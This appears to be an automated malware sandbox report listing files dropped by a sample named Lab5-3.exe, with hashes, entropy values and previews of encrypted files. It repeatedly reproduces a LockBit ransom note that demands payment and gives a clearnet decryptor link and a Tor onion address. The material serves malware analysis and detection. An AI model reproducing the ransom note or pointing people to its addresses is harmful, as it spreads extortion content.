                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):9888
                                                                                                          Entropy (8bit):7.980749693772817
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:192:cgWGOnR4n7V8VLbrHDTFiBS7wy72MM0WWjWZo4BKu0Cb:AKn7ViHDZiIFCCX4sutb
                                                                                                          MD5:793866846ED0DAE7BC6EC064945EC358
                                                                                                          SHA1:2841C6C8A7EA3F446588121D8D818EA101DEAB5C
                                                                                                          SHA-256:7C7BA10B852F448A9D50B6913E8ADE6395ABCF7F58B2326DA25C9C3B2880F9D7
                                                                                                          SHA-512:2C949A508DCE7998678464F7D6E1EFABA97936A6819159807D0846FC1B998122EAD8CD835D6AF9574B538B54349CC33A5046F964197B5A905A97E4E502387C36
                                                                                                          Malicious:false
                                                                                                          Preview:....A...D...s....B-..-....9Rp_RKh..[i..{Z.......t"....H.n..sjei2s.#....>.#_.!....X....D.}..3"..@.n.=..q....O]..N....6.w.P...z.......B.k..,...W}..S...KC,.k.mW+.j..}~+..k^j...+.e|...<tX..xt|J..|..GV.......^x..Gp.b...+.q.D..o..+.*.[X.Dw7.WIh.83.K6...nN...m.vO1.?..I".!.`7W....z.K.KQ...:.z}.....B.-!.....*J..7...^a.I.......D}....S.L..].b...U...Nb..\.....|..$.j.)...s....B.(Z.G...H....J.%.-G^01......W.5`pM.3.Kf941....o..{...E9YH.QY..N.N.B..{V.E.H.z4..".'c..`..-..r.._.2.....^...#..F.....!....an...kX.D/o#GrO..:.Q.....W+..="..'wA.@.z.W..D..6x#..Cu.`..l....vYp.g..p&/e,.-.a.U.... .=;.i...y..J.....#Y...Y....k..-...w2-..}.4..:"z............$K.........ST5..z...|G...y.m{t\..O. `.*..P|.v.]X.Bc.....Eb..p.@.z.!=.k.L.U.<.k.M./.....<...Odc...."&............'WH!.H.&..I'.X..p.8.@'.....[1.{.........u..}...~)..l.!i0Q.G..*..L..:.Bf...`..v......&C.D..w..Xe....nr.../...C ...n.......j.3.p.1.L....-.!.j.F.........%...G....-..~9..w..F..S..^X....0*\+.K.0..._{.Ex.A...m.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):11104
                                                                                                          Entropy (8bit):7.983940214325788
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:192:88bWjL+4vc3lJyeL+hfg6DI7fQu7z7baT7YF3Z8oiLAwdWKkW+0Cb:8n1yJye6fQfQ1TNo4AaEW+tb
                                                                                                          MD5:539D6E43F164D2F4A06CA32537234B44
                                                                                                          SHA1:FF8B290032A37F3A7364253D242E61994C822FB5
                                                                                                          SHA-256:B3E3DBEEEFD9FA80CAC103E4000E3A8824821D858EDEE62F85D87613BF2AF180
                                                                                                          SHA-512:7D4AD07AF5329025A5E9100108B36EE5F068977A71C4883D1DB9DBFEA17361DC2D974328EE793F3CFD6D7F79A9315D0A677D17122AD5FD5C840567BB7FA3CE08
                                                                                                          Malicious:false
                                                                                                          Preview:....Q"..C.+.r.U)c....6...lS.a..,...S...ka..X...O.....^F/xp`....zm..Tp.n...58G....+-3:t..(rb...7y.O ..W....v..q..=`|.<.0......,.....z.x.P.-c.14......+x..6[.b.@U]0.#...N..d._....o...=....A.ny...g>...$+2e.Q..."G......>.T[...F..60...$.C*..N~..a.......2........+..3_Tf....;...T...E...:7..U'...Bjd.tV..6t.|.|.6.......)w..%.k.K..+..&....6.Q...c...9!..a.p...>....)g...../.@w.w5,^>GWGW....."?F5J..v...q.k.J..i.....5.....k .v....].v../.G7..R..`...Y.z..}ycJ.N.%..m|.Oi.r.5A...Rb7.Z........Mz....9.%x.L..f...l...).U..~_z../.R.....1A\B.%....+...B.v...E.......4..jue...`.....ee....ci...D....(U...j..$....hBw.Ir....D.......2..:.....^E.vbY..7..9..VQx..,...1;.....U...<....@kM/.3.xb. W....S..G....o..6P.8.....A.p..........vu4LW.....4.OFS..G..5.<.....\:.D.N.........g...si...~..Lte.h....ZP.e..j....@.PKd.o..w".B...][..-.....e..........A...5......Bc.;W..S...I..M......H.X..RR.D.....`.N..d|d.)...W.X.O..?..S[........r5ABx*.q......;..).3...y...:F...,0......A..x
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):10800
                                                                                                          Entropy (8bit):7.983408946162446
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:192:Laz9Qr9IIQM3n0gJAo/DwnRjEcjM008LnwyTHXcZ+0Cb:LWe5IO3nZLS0yTH++tb
                                                                                                          MD5:EB86FF4CDAE4CA56A1D0F986DCEF4F17
                                                                                                          SHA1:ABE3E45FE14AFEDC19D76AB64D75718DCC2984AE
                                                                                                          SHA-256:ADD5F421A9F5479BE954AECC57C892F5187814344EBBD3290FC916765A0A674B
                                                                                                          SHA-512:42CEEF040BE7C99DFFA62B045786FDCB3266663DB8DAFA0CEFCAF4DC536030D796731982B995EC57FC876F0844178EA5135761A88782E98F105637B0503E2D64
                                                                                                          Malicious:false
                                                                                                          Preview:,......C.a......}.o+......H5'.%.)F...^W..W.nE1S..[:.7U.TR.y.....`.k..z.%;..")..S..a..T .VX.h.FOH..0AU.H..."G....Jp>..,..~[.y...+.....HA....?..Od..:.HR..........&..D..Q`..mEW:V..3.:....7...Bs...4..F...!..^..9.#...Q..2..I.2........H.F..&.z........&......\.Z...a_0.....jZ&....[.#...I.}...E.......~/..Q.{...`..2u[[...../.8.....y.\..v.......n..!.....(.........../..s...}A....V.Zb1g=,..|.X....WU;...T...XC.`..{...F.PZ}w.LpQ.e.Gp(C.6.......T.......utO.a>wh......M=.j...Y*.+v!@..x.it.-k.-...xz..Hlm;...O$.u..[.'z......a....j-=.#.j...J...L..J8..x....i..,.@N..nWy.%..{.ow..XH.I..F<.0A..d....,.G..E......r..&9....l....?.....M.A..e.Z.....*~DI.D....5.^.m.^.y......f.0O.=.C..i]g.......-...x.`...+..Qy.(.....L..?wH..D.|i.G.l..k.j..g.J.....~u..?..m+....7h...'.....;?.w8.4`...(K.......EV..k.cS......k....H..zu=_+.. i.PVxZ&...O......sw.....aS7.'..z.:.5O ..`+....@......Q1P)V.:.>.~._..L3W....T.8.c..u.X..P..v..w.....!_..L...8.X..O...P%.%BL.`Z.2!.-w.-i.C|.Tc.G. ..:./..M4<.JV._s.'U
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):10736
                                                                                                          Entropy (8bit):7.983887429020954
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:192:dZt4FB0b7BxjS8qy/v+YT//CDhVIHInZmcnwWVguAbEPjyYSn0Cb:28b7BNSny/vEhVIHamVWVFzentb
                                                                                                          MD5:6C3301CBE07D4FF06C3FD449D126FE8F
                                                                                                          SHA1:4C614EE7FBA7BF3458E101F7CD53B2EC626062DA
                                                                                                          SHA-256:0A1F9C83700C243B6FC56A18CB3C3832C1CF3056D7ECAF73AC2471B7A2AB9F22
                                                                                                          SHA-512:15CE7C6BFEC01DFEB616F66989BE83394C81B5EF6025C84581A36E168BBE57969D39043153C0B966140346F769681124F75274901906E272AE4960147D6BCBDD
                                                                                                          Malicious:false
                                                                                                          Preview:.'.Bp....q...?...Z....._1...k.y.....6`/F.3...$.9..[.L.z._oh..!..7Cx$z.*).w.5Sy.s..#)..ZR=o,.f.~..X.........0....R>..e...Ts.a..."..]f-...K...Ey.a..r.[..)O.:..G.@....?...u...<..4U.xMzE..:d..A.RF....1B..o......[*.o4.^..z.3..}....6.{...7.W.6....idH.XE."..W.C.R6M......u...v....Y.......A`X..E..Y..#...i1.9./...s.-.ggK...k....1....5.{..j..C.7....d.....P\.qK.BA?_...0O U......h.qr.$.*y..aZ..(...*+0....Z.[...Tg._*.?.<t.].2.q=..9/.4..R.....[.u.....w.bO.....To%{....{....U..g.[...nN..2Z....\....X{m..t.'..;...[...=.....vmR(rT2..4.J.....>w..........?j.7|P...f....a....!..../.DS.X..Y.!..o8g:dw.v.G..[.xjG...[....<....:.2dy]........s.[.........a.[pE..#.U..|X.N.*.sP.P)..u..........;..T.$.R..p...O/N...&..2....ANV.OQ..,.V..s0..Y.]L.IB.e.@#D(x@.......~...0?.....8..[...>......g\..7.7...K.[......g.......b......V.;e..;..SqQ...mN?..hE.....j..*2..-.s{..n!.r..b.K).)A....N..>.<.E...............+......l...$x..../.#......b...h.R..,..s#-<T.q.R....'...2rq...M+
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:OpenPGP Public Key
                                                                                                          Category:dropped
                                                                                                          Size (bytes):11136
                                                                                                          Entropy (8bit):7.983766096301027
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:192:VjFiya6PdnFvek2xR9fH747lzOZfsG50A4qt1LEAlXwi9Bf5DM0Cb:Vsn6L2k2Rfb456fss1oCgqBftMtb
                                                                                                          MD5:51B2902A7AD5CF01C4BAC79305960F2F
                                                                                                          SHA1:16C45562D440C6F15ACA8B3CC2CEDB1635394C75
                                                                                                          SHA-256:6B41B453906175E3F9204438382B378E2B04CA39F34395BFD3EEE25FE3FA757B
                                                                                                          SHA-512:7A021ABC57082C4928825701E55118D7E3DE8A8DF8A0429469F5183D1BA3EDB3FA34453FBC2265A5CC2DAD86C74A64B4F342FB84207470535DFA935A02FA1E2C
                                                                                                          Malicious:false
                                                                                                          Preview:.,15...T.........0.......Vc.Dn....{.i...K..h.v.....Io..w.&F..%..v.....6.3..w^b..6|C|..I..../.!]..n>..4U...A..Z.h.)..T.P...`...WQp.g....!.....)0..%.Cn..G....A..v..#9.b...;..Q.!.Ii.. q.EC........$.i..........x+"..Z.0.....[HaS..T;o.Bs@H.4..zgl.0.9hZs.T.u.|.?1...Y.......0..[...+.he.2.hT.Y.d.=..B5.g...F..V...i!2.F.\N...&D..;.xo`....nGx.p...Kbz..Y.......!9.z.v...P..bo..x.n.P..F....G.t~....Z$.`.2.6.(..Q......>..f../........*..F...i.....r....;7....n...x0.n`..$...O..D1.].L!h.f.mq.......AGOO...;...]9.Iw.Iz... bk...LD......3...:.f....>..+..7m.qx.8LjD$!\p4.z.P...j%..c...B....$.Xs...3.Y;.......!....c.?'.B.^....&..5-...>.x\.5..@$...t.).}..Z.....X/..y.=.v.Y3..+]..u.......d..g'B...q....|..~d../%."i.x.T`..<.B......6.T......9.....@.6......^g6.E...Ex]..a.....q.7.`......A...E............7f..M.B...,U6.J#2.Mb.X....j..ZF."..j?.#..5..=]5'.S.D..1.(+|....}nC.m..r%.wI....QK+...zT.O.w.C...Qn..n.4@._ah\}>....R..Q.:..(.o....vzi+.).$...M..=U#..>d<.....U....D..d.HI{2.m..`
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):11136
                                                                                                          Entropy (8bit):7.985071734743611
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:192:Rb+edhCxHKd0txz/vmaC1KIddm/zJGA5+JoOvjLS4uqzs2Wscqs0Cb:RCedhCxqWvB3gA5+nE0sXshstb
                                                                                                          MD5:3CE5BF7308822DF8CBB33BAFCE2BD936
                                                                                                          SHA1:E01780D0765514D6737BAE18749D57E58FEA634D
                                                                                                          SHA-256:2BC647BBB0D7B2C3078FD9158DAA33F49B61FAB0084708DDE90449A5A7FE7D5B
                                                                                                          SHA-512:A1EA689829B045C380E118BF392CBBBBFCA331E0638D26333054AE6013CD0E88F4A6BBCA97B88BFC26311D24CF8DE627F75A9AC81E6E22EE85672E31E23A7FA1
                                                                                                          Malicious:false
                                                                                                          Preview:.F...t.>....v.d..8_.{E....ov.....O;...^u..#.S.N"..{...q...P..w..|TB.n.....Fj.*v.....\+f...x.....D{.6.omc..T....1n..G..X.$.W`.N...ei7..D&PD&.y..i;.,.........F.}t."..H.J].j]=..h.sj..........p......Iq.....V7...H....7..nX.B#.V...,.@=q.....])i3.)...f @...``|.>....]......y;G?.p......]..x].s.V..u..rq...NX...88..V..v,....-w.]T.o.(R.B...i.9^oSZ.Iv.....-W..:..&......i....?.....\.3..r..a.F..\{..F;.".^......f.+.!..0..b......S.....G.xvNn.-.....n.=W....N...+^g(..G.....-G..bG....Qyd...J0@..Ebp3.3t.q>w.F.....x...1f..M. \.m..E...a..h6.$.E..3...hg.~j..O..b#....S.q.-..."..:..6\..............._.[....4.F...#.(.D..aO...9..5..L.... +......d-..3....vZ.........y..m....1....G.p=h.9a..?..;.}....r....E.>.............S.@.hm.+T...x..5....g...a.N.....>...l.w.,...]}`.W.k]...N...d.9..H..p..F.X.e.....r.m..?..xy..2...L.A..Y.R...V!/..Nr..i."....Z.......oM.#&..+.f.f.......5....,...Q.+gb[...)..M.[..A...:._.>.)H([.Z.....u..F...!..0..Z.9.Pv.........:H..g.g..78....&..
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):10768
                                                                                                          Entropy (8bit):7.981705655262925
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:192:qn9//fS8qwl7k0JtJGtfQKuU3VLHoYb+eLs6sNp+8c1xb0Cb:qn9//2Y7LrefJvLlVkp+vvbtb
                                                                                                          MD5:5E4A6BB77B8266CEFD39F81729B584E2
                                                                                                          SHA1:7A6908424A082F0062933E1ADC0845E43C679F43
                                                                                                          SHA-256:D5AA7E2F48A414285BA6A03FE1E6C4411A07EB7FA47B4174AA0DA2C248D33315
                                                                                                          SHA-512:75FE774E6ED2FBF5735B92DF1AC876FA28943E0C7729FFE8785B2E1AEFAB1482869F9577B2F2FF88288F871B82BA532151C104272590DF3239EF5DAA84A54C0D
                                                                                                          Malicious:false
                                                                                                          Preview:1Uq..[(....P.c..<..fG.#?vw..T....E....Z..s.}..;v.O.T7...WIL.Lv..S|...Vi...-.WoN.D.UA+c.4C..Hg.....y..cP1#Yj./Z+....3....{F...tl,<._C......P.!....#.(a.i..Z.]QV.#..H_m..W..O.....y.U....p@.O....(.J.#6..EW.'.H%.:1..}N#...umc.D....$4...d,8.!...;....BBK.5.....s.1x.f_.usz5.S.b..^.....aS,.....::JZB..x.{..#pD.S.....!.._..I.$...`U.V.....VK...$h:..3\M>o#]3a.K.r..CaN.......I.g.....M./C.w...3>o.X`.....@....Z..vW]......l.... M.D....$.P;.Q..._..>...mZx...f.h..c.....n.,.=|..'..Z./M.....#ltP@..]...%..-.-.@.........`_.;[s.@MN...W.O..jDe.W.....h...>..%/.^.6.Q}.w]Gg..c..M......U+.[..{...OFzN.._N.M.<.[=.....Cz...g..O......:u.pV.........Xh.}..X..NaN. .$.Z.L....a.<.^...!.}.uGC..@..^.1...Q.v.G.W.hw..k.1..).N...0..-.5V...2L.n\....4w..\..l-........k...].u.F..Q4).B..B.w.....r..=Z{jz.i....W....A2.....c.....zBy..B.i.ocO....JD.....Z@....zn...3..i.6.*.G..>.v.......$.N+t..G..U)95X...0.}.:..Y.K\9.Z.......o..9...>j....`[...`@.PC\..]i.........q..~pq.......:.w.......(<.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):11040
                                                                                                          Entropy (8bit):7.983571690387219
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:192:5U1rvtCBYy+TLHdP1UP3ARVSaSlaNpFTcR+of3pu4jsGmpwl0Cb:crvtKOHvUP3AVSaSg71BI3p1Hwwltb
                                                                                                          MD5:761E17B0047CFA7A94B08FEC9B5C140E
                                                                                                          SHA1:2F752A4DB1441CFF44E0AA31597F874D3F15AE5E
                                                                                                          SHA-256:78BE8BD3371D1BA4B4057779DAA8F1DE50C2CBC98BAF9D67F49DEB57C604F4C9
                                                                                                          SHA-512:7C79EF33F8B6520B981A3841CC4F3ACBF469F29458224736079406FFC3F680A22394BA435571F7E87F776C46BECE7C9F045748801BA0B74418D53AEF0A4213E7
                                                                                                          Malicious:false
